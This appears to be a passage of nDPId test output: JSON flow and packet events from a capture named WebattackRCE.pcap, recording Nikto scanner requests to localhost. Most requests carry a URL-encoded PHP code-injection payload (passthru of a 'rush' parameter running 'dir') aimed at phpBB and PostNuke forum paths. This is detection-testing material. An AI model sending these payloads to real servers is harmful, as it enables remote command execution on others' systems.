00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01228{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"}
01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="}
01219{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="}
01219{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"}
01211{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="}
01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="}
01220{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
